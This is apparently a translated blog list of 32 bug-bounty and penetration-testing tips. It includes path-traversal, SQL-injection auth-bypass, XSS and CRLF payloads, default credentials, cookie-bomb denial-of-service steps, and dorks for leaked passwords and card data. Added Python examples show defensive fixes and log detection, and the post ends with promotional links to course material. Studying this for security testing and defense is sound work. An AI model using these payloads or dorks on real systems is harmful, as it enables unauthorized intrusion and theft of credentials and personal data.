[2025 edition] The latest 32 useful penetration testing tips, from zero to mastery: save this one and you're set

32 useful penetration testing tips collected from X:

[ ] Tip 1

Here's my last finding (P1):
1. Register an account.
2. Intercept the request.
3. Here's the response in the image: in the "role" parameter we have ROLE_USER, so I didn't know what to replace it with to escalate my account to admin.
4. Open the source code and look in the JS files.
5. In the JS files I used Ctrl+F to search for "user_role" and found another value called "admin_role".
6. Use match and replace to swap the values.
7. Boom: escalated my account to an admin account with full control.
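The flaw in Tip 1 is a server that stores whatever role the client sends at registration (mass assignment), combined with a JS bundle that ships the name of the privileged role. The Python below is an added example, not code from the tip's author or from the affected target: the request shape, the role names ROLE_USER / ROLE_ADMIN, the audit_log sink and all function names are assumptions made for illustration. It places the vulnerable handler beside a hardened one that decides the role server-side and records a client-supplied role as a tampering signal, and adds the pre-release check a defender would run over the client bundle to see which role identifiers it leaks (step 5 of the tip).

```python
import re

ROLE_USER = "ROLE_USER"
ROLE_ADMIN = "ROLE_ADMIN"

# Assumed audit sink; a real service would write to its application log or SIEM.
audit_log = []


def register_vulnerable(request_json):
    """Mass assignment: the 'role' field of the client's JSON is stored as sent.

    A client that intercepts its own registration request and swaps ROLE_USER
    for the admin role it found in the JS bundle becomes an admin (Tip 1).
    """
    return {
        "username": request_json["username"],
        "role": request_json.get("role", ROLE_USER),  # the client controls this
    }


def register_hardened(request_json):
    """Role is assigned server-side; a client-supplied 'role' is ignored and logged."""
    if "role" in request_json:
        # Self-registration never legitimately carries a role: treat it as a
        # tampering signal and record it for detection.
        audit_log.append(
            "tampering: role=%r from %r" % (request_json["role"], request_json["username"])
        )
    return {"username": request_json["username"], "role": ROLE_USER}


def promote_to_admin(account, actor_role):
    """The only path to ROLE_ADMIN: an existing admin grants it, checked on the server."""
    if actor_role != ROLE_ADMIN:
        raise PermissionError("only an admin may grant ROLE_ADMIN")
    return dict(account, role=ROLE_ADMIN)


ROLE_IDENT_RE = re.compile(r"\b[A-Za-z]+_role\b|\bROLE_[A-Z]+\b")


def role_identifiers_in_js(js_source):
    """Pre-release check: which role-like identifiers does the client bundle ship?

    Anything this returns is knowable to every user, so the server must not
    rely on clients never guessing it (which is exactly how step 5 worked).
    """
    return set(ROLE_IDENT_RE.findall(js_source))


# Constructed samples (not taken from the original target).
TAMPERED_REQUEST = {"username": "alice", "role": ROLE_ADMIN}
SAMPLE_JS = 'const roles = {user_role: "ROLE_USER", admin_role: "ROLE_ADMIN"};'

if __name__ == "__main__":
    print(register_vulnerable(TAMPERED_REQUEST))  # role is ROLE_ADMIN
    print(register_hardened(TAMPERED_REQUEST))    # role is ROLE_USER
    print(sorted(role_identifiers_in_js(SAMPLE_JS)))
```

The hardened handler deliberately does not reject the request: the account is created with the default role and the attempt is logged, which gives the detection team a clean signal without telling the sender that the field was noticed.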

[ ] Tip 2

May God bless your days. This is a bug at Microsoft. It was very simple, caused by a misconfiguration of an IIS server. Exploit: https://anywebsite.com/c:/Windows/Win.ini

[ ] Tip 3

CloudFront bypass: ⚔️ `">%0D%0A%0D%0A<x '="foo">` Would be interested to know if this is target-specific or other CloudFront websites are vulnerable.

[ ] Tip 4

1. Get all the URLs from Wayback / gau.
2. Filter out the JS files using httpx.
3. Check all the JS files manually, or use a nuclei template, or use the @trufflesec Chrome extension.

[ ] Tip 5

target.com/wp-config.php => 404 not found
target.com/wp-config.php.… ==> 200 OK and downloaded
wp-config.php.swp ==> 200 OK
After that, if it contains hex-encoded content, decode it.

[ ] Tip 6

Try testing for SQLi authentication bypass: ⚔️
username: `'--'` / `"--"`
password: `'--'` / `"--"`

[ ] Tip 7

Default credentials: PSADMIN:PSADMIN, PS:PS, PSEM:PSEM
Google dork: `intitle:"Oracle+PeopleSoft+Sign-in"`
Wrote a nuclei template to test all permutations.

[ ] Tip 8

`nmap -sV -iL host.txt -oN nmap_scan.txt`
Wait a few hours.
`cat nmap_scan.txt | grep open`

[ ] Tip 9

- https://youtu.be/VsM6ERUx_AA
- XSS payloads: https://github.com/Aacle/xss_payload
- Use Nuclei for leaked API tokens: `nuclei -t /nuclei-templates/token-spray/ -var token={yourToken}`
- Scan through TOR: `sqlmap -u "http://target_server/" --tor --tor-type=SOCKS5`
- Tip: always check the company's/organization's employees' GitHub accounts for leaked ghp_ tokens, and check access to each repo of the main organization.
- Bypass alert ==> `[alert][0].call(this,1)`

[ ] Tip 10

1. Go to Shodan and get the IP.
2. Go to Dirsearch and do some fuzzing.
3. Obtain sensitive data.

[ ] Tip 11

Recon, recon, recon!! Shodan dorking always wins: `ssl:"Company Inc"`. Filter results by HTTP title. Start fuzzing an interesting asset. Found swagger-ui/. Tried Swagger UI XSS with https://github.com/seanmarpo/webjars-swagger-xss

[ ] Tip 12

Have you ever heard about wc.db file disclosure?!
> You can check it at: https://target[.]com/.svn/wc.db
> Then you can use this tool to dump all of the website's source code: https://github.com/anantshri/svn-extractor

[ ] Tip 13

1. Shodan dork -> some assets.
2. Fuzzing, and got 403 Forbidden on the /config dir.
3. Fuzzing on /config/FUZZ and getting some config files.
4. Same pattern, and it works on another asset.

[ ] Tip 14

Default credentials admin:admin
Shodan dork: `ssl:"target[.]com" 200 http.title:"dashboard"`

[ ] Tip 15

A quick thread about JIRA misconfiguration that I tried today.

3. Google dorks to find Jira dashboards: `inurl:/ConfigurePortalPages!default.jspa?view=popular`
4. Google dork to find the Jira filters page: `inurl:/ManageFilters.jspa?filterView=popular AND ( intext:All users OR intext:Shared with the public OR intext:Public )`

[ ] Tip 16

1. Google dork to find the exposed user list: `inurl:/UserPickerBrowser.jspa -intitle:Login -intitle:Log`

[ ] Tip 17

GitHub recon tip: look for CSV files that have a high chance of containing confidential information.
Dork: `"org:company extension:csv admin"`
Leak: cc number, cvv, email, phone number

[ ] Tip 18 Oneliner for possible Reflected XSS using Nilo, gxss and Dalfox:

`cat targets | waybackurls | anew | grep "=" | gf xss | nilo | gxss -p test | dalfox pipe --skip-bav --only-poc r --silence --skip-mining-dom --ignore-return 302,404,403`

[ ] Tip 19

Tip: on a "GET request for XML not found" response, change the request to POST with an XXE payload.

[ ] Tip 20 Extract Juicy Info From AlienVault

`for sub in $(cat HOSTS.txt); do gron "https://otx.alienvault.com/otxapi/indicator/hostname/url_list/$sub?limit=100&page=1" | grep "\burl\b" | gron --ungron | jq | egrep -wi 'url' | awk '{print $2}' | sed 's/"//g' | sort -u | tee -a OUT.txt; done`

[ ] Tip 21 bypass PHPMYADMIN

phpmyadmin => 301
PHPmyadmin => 200
PHPMYadmin => 200
PHPMYADMIN => 200
phpMYadmin => 200
phpmyAdmin => 200

[ ] Tip 22 SVN

1. `./dirsearch.py -u target -e php,html,js,xml -x 500,403`
2. Found http://url.com/.svn/
3. Clone and use https://github.com/anantshri/svn-extractor
4. `./svn-extractor.py --url http://url.com --match database.php`
5. The result is in the output dir; just open it.
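Tips 2, 5, 12, 21 and 22 all describe the same class of exposure seen from the attacker's side: a file or panel that should never be reachable answers 200 (a Windows path through IIS, a leftover wp-config.php.swp, the Subversion wc.db metadata, a phpMyAdmin panel reachable under a different letter case). The Python below is an added example, not code from any of the tip authors: it is a small access-log scanner that a defender can run over their own logs to find both the probes and the hits. The log lines are constructed for the example, the combined log format regex is an assumption about the log layout, and the four rules are mine. Paths are percent-decoded and lower-cased before matching, which is precisely why Tip 21 works against a case-sensitive access rule sitting in front of a case-insensitive filesystem.

```python
import re
from urllib.parse import unquote

# Constructed combined-log-format lines modelled on the probes in Tips 2, 5, 12,
# 21 and 22. Not real traffic; addresses are from documentation ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2025:10:00:01 +0000] "GET /c:/Windows/Win.ini HTTP/1.1" 200 92
203.0.113.5 - - [01/Jan/2025:10:00:02 +0000] "GET /wp-config.php HTTP/1.1" 404 0
203.0.113.5 - - [01/Jan/2025:10:00:03 +0000] "GET /wp-config.php.swp HTTP/1.1" 200 4120
203.0.113.5 - - [01/Jan/2025:10:00:04 +0000] "GET /.svn/wc.db HTTP/1.1" 200 82944
203.0.113.5 - - [01/Jan/2025:10:00:05 +0000] "GET /phpmyadmin/ HTTP/1.1" 301 0
203.0.113.5 - - [01/Jan/2025:10:00:06 +0000] "GET /PHPmyadmin/ HTTP/1.1" 200 1300
198.51.100.7 - - [01/Jan/2025:10:00:07 +0000] "GET /index.php HTTP/1.1" 200 512
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)

# Rules run against the percent-decoded, lower-cased path. Lower-casing is the
# point for Tip 21: an access rule that matches "phpmyadmin" case-sensitively
# misses "PHPmyadmin", while a case-insensitive filesystem still serves it.
RULES = [
    ("windows-path-traversal", re.compile(r"/[a-z]:/")),                  # Tip 2
    ("wp-config-probe", re.compile(r"/wp-config\.php(\.[a-z0-9~]+)?$")),  # Tip 5
    ("svn-metadata", re.compile(r"/\.svn(/|$)")),                         # Tips 12, 22
    ("phpmyadmin-probe", re.compile(r"/phpmyadmin(/|$)")),                # Tip 21
]


def classify_request(path):
    """Names of the rules a request path triggers (empty list if none)."""
    normalised = unquote(path).lower()
    return [name for name, rx in RULES if rx.search(normalised)]


def scan_log(text):
    """One alert per matching line; a 200 on a sensitive path is marked 'exposed'."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m is None:
            continue
        hits = classify_request(m.group("path"))
        if not hits:
            continue
        alerts.append({
            "ip": m.group("ip"),
            "path": m.group("path"),
            "status": int(m.group("status")),
            "rules": hits,
            # The probe itself is reconnaissance; a 200 means the file or panel
            # really is reachable and needs removing, not just blocking.
            "exposed": m.group("status") == "200",
        })
    return alerts


def exposed_paths(alerts):
    """Sorted list of paths that answered 200: the remediation worklist."""
    return sorted({a["path"] for a in alerts if a["exposed"]})


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for a in found:
        print(a["status"], a["ip"], a["path"], ",".join(a["rules"]))
    print("exposed:", exposed_paths(found))
```

The two outputs serve different teams: the full alert list (probes included, whatever the status code) goes to detection, while exposed_paths is the list the application owners have to fix, since blocking the path at the edge leaves the backup file or the .svn directory on disk for the next bypass.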

[ ] Tip 23 xss

In the name fields:
firstname: `<img src=x`
middlename: `onerror`
lastname: `=alert(domain)/>`

Blind XSS:
1. Use https://github.com/Leoid/MatchandReplace
2. Import it into Burp Suite match and replace.
3. Run gospider: `gospider -s url -a -w --sitemap -r -c 100 -d 8 -p http://127.0.0.1:8080`
4. The blind XSS payload will be added automatically by Burp and gospider.
Finally: 4 blind XSS reports.

[ ] Tip 24 Cookie Bomb

A URL that causes the cookie length to exceed request header limits for all requests until the cookie expires.
1. Find a cookie set by a parameter.
2. Inject as many commas as you can into the parameter until you DoS that user.
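The cookie bomb in Tip 24 needs two things from the application: a handler that copies a request parameter into a persistent cookie without a size limit, and no way for the victim's browser to recover once every request is over the header limit. The Python below is an added example, not the tip author's code: the `lang` cookie, the 256-byte value cap, the 8 KB header budget and the function names are assumptions for illustration (real header limits are server settings such as nginx `large_client_header_buffers` or Apache `LimitRequestFieldSize` and vary by deployment). It shows the vulnerable setter beside the hardened one, and an edge-side recovery routine that, on seeing an oversized Cookie header, replies with headers expiring every cookie the client sent so its next request is clean.

```python
import re

MAX_COOKIE_VALUE = 256
# Assumed total request-header budget; the real value is a server setting and
# differs per deployment, but 8 KB is a common order of magnitude.
HEADER_BLOCK_LIMIT = 8192
SAFE_COOKIE_VALUE = re.compile(r"[A-Za-z0-9_-]{1,%d}" % MAX_COOKIE_VALUE)


def set_cookie_vulnerable(param_value):
    """Echoes a query parameter into a year-long cookie with no size or charset check."""
    return "Set-Cookie: lang=%s; Path=/; Max-Age=31536000" % param_value


def set_cookie_hardened(param_value):
    """Allowlist plus length cap: anything else sets no cookie at all."""
    if SAFE_COOKIE_VALUE.fullmatch(param_value) is None:
        return None
    return "Set-Cookie: lang=%s; Path=/; Max-Age=31536000" % param_value


def cookie_names(cookie_header):
    """Cookie names in the order they appear in a Cookie request header."""
    names = []
    for part in cookie_header.split(";"):
        name = part.strip().split("=", 1)[0]
        if name and name not in names:
            names.append(name)
    return names


def recovery_headers(cookie_header):
    """Edge-side self-healing for an already-bombed client.

    If the Cookie header by itself exceeds the budget, answer (from the proxy
    or a minimal error handler, before the request is rejected) with headers
    that expire every cookie the client sent, so its next request is clean
    instead of failing until the cookie expires as the tip describes.
    """
    if len(cookie_header) <= HEADER_BLOCK_LIMIT:
        return []
    return ["Set-Cookie: %s=; Path=/; Max-Age=0" % n for n in cookie_names(cookie_header)]


# Constructed: the tip's "as many commas as you can" in the parameter.
BOMB = "," * 10000

if __name__ == "__main__":
    print(len(set_cookie_vulnerable(BOMB)), "bytes of Set-Cookie from the vulnerable handler")
    print(set_cookie_hardened(BOMB), "from the hardened handler")
    for h in recovery_headers("session=abc; lang=" + BOMB):
        print(h)
```

The expiring Set-Cookie headers only clear a cookie whose Path and Domain attributes match the original, so the recovery routine has to use the same attributes the application uses when it sets them; the example assumes `Path=/` with no Domain.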

[ ] Tip 25 xss via jwt

1. Make a JWT token and insert an XSS payload.
2. The final URL is like url/dest?jwt=vulnerable-jwt-token (the jwt= parameter was decoding the provided JWT token and showing it in the page).

[ ] Tip 26 Getting Private Information URLs by curling

1. Grab all the URLs from your target that you think are hard to hunt or test, or are static.
2. Save them all in any.txt
3. Command: `for i in $(cat any.txt); do curl "$i" >> output.txt; done`
4. Grep all the curled responses for the following keywords: `drive.google`, `docs.google`, `/spreadsheets/d/`, `/document/d/`
NOTE: this creates lots of junk, so make sure you run it in its own folder that you can delete later.
You will get URLs that include juicy information.

[ ] Tip 26 Injecting Payload In Phone Numbers field

https://twitter.com/Pwn2arn/status/1609146484263641089

[ ] Tip 27 Easy P1

1. Collect all the JS files using the developer tools in Mozilla Firefox.
2. Run the LinkFinder tool on the JS files you got from the dev tools, or use the JS Miner tool.
3. Now manually check the JS files for sensitive keywords.

[ ] Tip 28 Tips for my last P1 :

1. Found a dev portal for development that requires Basic Auth.
2. Searched GitHub for "domain" docker.
3. Found a user trying to pull the private repository and passing username:pass.
4. Decoded the Base64 Basic Auth.
5. Logged in with full access to all of Prod.

[ ] Tip 29 Github leak for Aws,jira,okta etc

1. org:"target" pwd/pass/passwd/password
2. "target.atlassian" pwd/pass/passwd/password
3. "target.okta" pwd/pass/passwd/password
4. "jira.target" pwd/pass/passwd/password

[ ] Tip 30 sourcemap JS

https://blog.prodefense.io/little-bug-big-impact-25k-bounty-9e47773f959f
https://github.com/rarecoil/unwebpack-sourcemap

[ ] Tip 31 if a site uses AngularJS,

test {{7*7}} to see whether 49 is rendered anywhere. If the application is built with ASP.NET with XSS protection enabled, you might want to focus on testing other vulnerability types first and check for XSS as a last resort. AngularJS client-side template injection scanner: https://github.com/tijme/angularjs-csti-scanner?fbclid=IwAR0z3X2XRXRugdCiGSMk_CHVn3-MZU1qFHWKVHXUEZ5oVPWOiYu4WwGqWhE

[ ] Tip 32 If a site is built with Rails,

you might know that URLs typically follow a /CONTENT_TYPE/RECORD_ID pattern, where the RECORD_ID is an autoincremented integer. Using HackerOne as an example, report URLs follow the pattern www.hackerone.com/reports/12345. Rails applications commonly use integer IDs, so you might prioritize testing for insecure direct object reference vulnerabilities, because this vulnerability type is easy for developers to overlook.
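The reason sequential ids make Tip 32 productive is that the id alone is the lookup key: if the controller fetches `/reports/12345` without checking who owns record 12345, every logged-in user can walk the id space. The Python below is an added example, not code from the tip's author or from HackerOne or Rails: the route regex, the in-memory REPORTS store with its owners, the request sample and the function names are assumptions for illustration. It shows the vulnerable lookup beside one that makes ownership part of the query (and returns the same "nothing" for missing and forbidden ids, so the response does not confirm that a guessed id exists), plus a log-side check that flags a user who requests a run of consecutive record ids, which is what the enumeration looks like from the defender's side.

```python
import re
from collections import defaultdict

ROUTE_RE = re.compile(r"^/(?P<content_type>[a-z_]+)/(?P<record_id>\d+)$")

# Constructed records; ids are sequential like a Rails autoincrement column.
REPORTS = {
    12345: {"owner": "alice", "title": "IDOR in invoice export"},
    12346: {"owner": "bob", "title": "Stored XSS in profile"},
    12347: {"owner": "carol", "title": "Open redirect"},
}


def parse_record_route(path):
    """('reports', 12345) for '/reports/12345', or None for anything else."""
    m = ROUTE_RE.match(path)
    if m is None:
        return None
    return m.group("content_type"), int(m.group("record_id"))


def fetch_report_vulnerable(record_id, current_user):
    """Looks the record up by id only: any logged-in user can read any report."""
    return REPORTS.get(record_id)


def fetch_report_hardened(record_id, current_user):
    """Ownership is part of the lookup; missing and forbidden look identical
    so the response does not confirm that a guessed id exists."""
    record = REPORTS.get(record_id)
    if record is None or record["owner"] != current_user:
        return None
    return record


def enumeration_suspects(requests, min_run=3):
    """requests: iterable of (user, path). Returns (user, content_type, run_length)
    for every user who requested min_run or more consecutive record ids."""
    ids_seen = defaultdict(set)
    for user, path in requests:
        parsed = parse_record_route(path)
        if parsed:
            ids_seen[(user, parsed[0])].add(parsed[1])
    flagged = []
    for (user, ctype), ids in ids_seen.items():
        ordered = sorted(ids)
        run = best = 1
        for prev, cur in zip(ordered, ordered[1:]):
            run = run + 1 if cur == prev + 1 else 1
            best = max(best, run)
        if best >= min_run:
            flagged.append((user, ctype, best))
    return sorted(flagged)


# Constructed request sample: alice walks four consecutive report ids.
SAMPLE_REQUESTS = [
    ("alice", "/reports/12345"),
    ("alice", "/reports/12346"),
    ("alice", "/reports/12347"),
    ("alice", "/reports/12348"),
    ("bob", "/reports/12346"),
    ("bob", "/users/9"),
    ("bob", "/static/app.js"),
]

if __name__ == "__main__":
    print(fetch_report_vulnerable(12346, "alice"))  # bob's report, leaked
    print(fetch_report_hardened(12346, "alice"))    # None
    print(enumeration_suspects(SAMPLE_REQUESTS))    # [('alice', 'reports', 4)]
```

Switching to random or UUID ids makes enumeration impractical but is not a substitute for the ownership check: the hardened lookup is the fix, the id format only reduces exposure while the fix is rolled out.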

An aside

How to learn hacking and network security

Today, if you just like this article, I'll share my private stash of security learning materials with you for free. Let's see what's in it.

1. Learning roadmap

There is a lot to learn for both attack and defense; everything you need to learn is written in the roadmap image above. If you can finish it, you will have no trouble finding a job or taking freelance work.

2. Video tutorials
Although there are many learning resources online, most of them are incomplete. This is a security video course we developed together with the major security vendor 360; it used to be internal material, and in terms of professionalism it beats 99% of domestic training institutions and individual instructors. It is the only copy online; you will not find a course this professional anywhere else.

The content covers the beginner essentials (operating systems, computer networks and programming languages), the various intermediate penetration techniques, and later advanced topics such as CTF competition and blockchain security. More than 200 videos and over 200 GB of material, so there is no worry about gaps.
Space is limited, so only part of the material is shown here; follow the link below to get it.

🐵 I share all of this for free; if you need it, get it here 👉: security resources from beginner to advanced

3. Technical documents and e-books
The technical documents were compiled by me as well, including the experience and key techniques from my participation in large-scale security operations, CTFs and SRC bug hunting. There are also more than 200 e-books, which I will not list one by one because of the sensitivity of the content.

Space is limited, so only part of the material is shown here; click the link below to get it.

🐵 I share all of this for free; if you need it, get it here 👉: security resources from beginner to advanced

4. Toolkits, interview questions and source code
"To do a good job, one must first sharpen one's tools." I have compiled the dozens of most popular hacking tools for you, mainly covering information gathering, Android hacking tools, automation tools, phishing and so on. Don't miss it if you are interested.

There is also the case source code from my videos and the matching toolkits; take them too if you need them.

🐵 I share all of this for free; if you need it, get it here 👉: security resources from beginner to advanced

Finally, there are the security interview questions I have collected over the past few years; if you are looking for a security job, they will help a lot.

These are questions people frequently run into when interviewing at Sangfor, QiAnXin, Tencent and other big companies; if you have good questions or good insights, you are welcome to share them.

Reference answers: Sangfor official site, QiAnXin official site, FreeBuf, CSDN, etc.

Content features: well organized, with diagrams for easier understanding.

Content overview: internal networks, operating systems, protocols, penetration testing, security services, vulnerabilities, injection, XSS, CSRF, SSRF, file upload, file download, file inclusion, XXE, logic flaws, tools, SQLmap, NMAP, BP, MSF…

Space is limited, so only part of the material is shown here; click the link below to get it.

🐵 I share all of this for free; if you need it, get it here 👉: security resources from beginner to advanced
————————————————

Copyright notice: this article is the blogger's original work, licensed under the CC 4.0 BY-SA license; when reposting, please include a link to the original source and this notice.
If this infringes your rights, please contact us for removal.
